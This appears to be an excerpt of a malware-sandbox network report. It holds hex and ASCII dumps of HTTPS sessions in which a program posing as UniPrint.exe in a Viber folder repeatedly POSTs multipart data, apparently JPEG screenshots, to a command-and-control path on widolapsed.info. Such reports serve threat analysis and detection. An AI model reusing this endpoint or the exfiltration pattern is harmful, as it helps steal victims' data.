                                                                                                      19192.168.2.34980645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:16 UTC1501OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76617
                                                                                                      Content-Type: multipart/form-data; boundary=--------3156620313
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 36 36 32 30 33 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3156620313Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:16 UTC1502OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:16 UTC1518OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:16 UTC1534OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:16 UTC1550OUTData Raw: 9e 97 b7 ec 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8
                                                                                                      2021-09-15 11:46:16 UTC1566OUTData Raw: 51 45 00 14 51 45 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5
                                                                                                      Data Ascii: QEQE0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFif
                                                                                                      2021-09-15 11:46:16 UTC1576OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 36 36 32 30 33 31 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3156620313--
                                                                                                      2021-09-15 11:46:17 UTC1576INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:16 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=3b273b46ce5cf5dc200b46f28ab0ccde5258bf96ac765c838fa97470de9ddd89; expires=Thu, 15-Sep-2022 11:46:17 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:17 UTC1577INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.34975445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:27 UTC150OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81223
                                                                                                      Content-Type: multipart/form-data; boundary=--------1733772180
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:27 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 33 37 37 32 31 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1733772180Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:27 UTC150OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ef c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:27 UTC151OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:27 UTC167OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:27 UTC183OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:27 UTC198OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:27 UTC214OUTData Raw: c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a6 4b 77 7d 00 47 9e d2 d8 46 d2 22 12 97 0c 48 dc c1 73 82 83 3d 7d 69 f2 3f e9 a1 73 af e9 32 fd 14 51 50 58 57 95 fc 58 ff 00 90 cd 97 fd 70 3f ce bd 52 bc af e2 c7 fc 86 6c bf eb 81 fe 75 ad 2d d9 9d 5d 91 c2 8a 70 a6 8a 5a dd 18 b1 d4 52 52 d3 24 28 a2 8a 60 14 b4 94 50 02 d1 49 45 00 2d 14 94 b4 00 51 45 14 08 28 a2 8a 00 29 69 28 a6 02 d1 49 4b 40 0b
                                                                                                      Data Ascii: I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7Kw}GF"Hs=}i?s2QPXWXp?Rlu-]pZRR$(`PIE-QE()i(IK@
                                                                                                      2021-09-15 11:45:27 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 33 37 37 32 31 38 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1733772180--
                                                                                                      2021-09-15 11:45:27 UTC230INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:27 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=85da168f2b6a531d09ea3d94b29bf46d98da146ecb3a89da44073fedfa538fa0; expires=Thu, 15-Sep-2022 11:45:27 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:27 UTC230INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.34980745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:18 UTC1577OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76640
                                                                                                      Content-Type: multipart/form-data; boundary=--------2353964795
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 33 39 36 34 37 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2353964795Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 98 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:18 UTC1593OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:18 UTC1609OUTData Raw: 1f f2 f4 b7 fc 32 2a 4a 28 ad 4c 45 a2 92 96 80 0a 28 a2 81 0b 45 25 2d 20 0a 28 a2 81 05 2d 25 2d 20 0a 5a 4a 51 40 85 14 b4 94 b4 84 2d 58 81 ba 0a ad 53 5b fd ea 89 6c 69 49 da 46 be ac 71 e1 a1 ee d5 c4 bf 5a ec f5 9e 3c 34 9f ef 57 16 e7 9a c7 0b f0 3f 53 d4 af f1 af 43 bd 1c 78 76 cb e8 2a 8e 6a eb 71 e1 fb 11 fe c8 fe 55 46 b9 e8 f5 f5 34 c4 3f 79 7a 0b 9a 33 49 49 5b 1c f7 1d 9a 50 d4 d1 45 16 04 c7 e4 d3 b7 1f 5a 60 a5 a9 68 b4 d9 20 63 4e 0c 6a 21 4e cd 4b 45 29 32 50 e7 d6 9c 26 61 d1 8d 42 0d 2d 4b 8a 2d 4d 96 96 e6 41 fc 46 a5 5b c7 1d 70 6a 90 34 ec d4 3a 71 34 55 64 5f 17 9f de 50 69 7c f8 5b ef 46 2a 86 69 43 1a 97 49 16 aa b2 f6 db 47 ea 98 a4 fb 1d a3 74 38 aa a1 8d 38 31 a9 e5 6b 66 52 9c 5e e8 94 e9 91 9f ba f4 c6 d2 db f8 5c 1a 03 9e
                                                                                                      Data Ascii: 2*J(LE(E%- (-%- ZJQ@-XS[liIFqZ<4W?SCxv*jqUF4?yz3II[PEZ`h cNj!NKE)2P&aB-K-MAF[pj4:q4Ud_Pi|[F*iCIGt881kfR^\
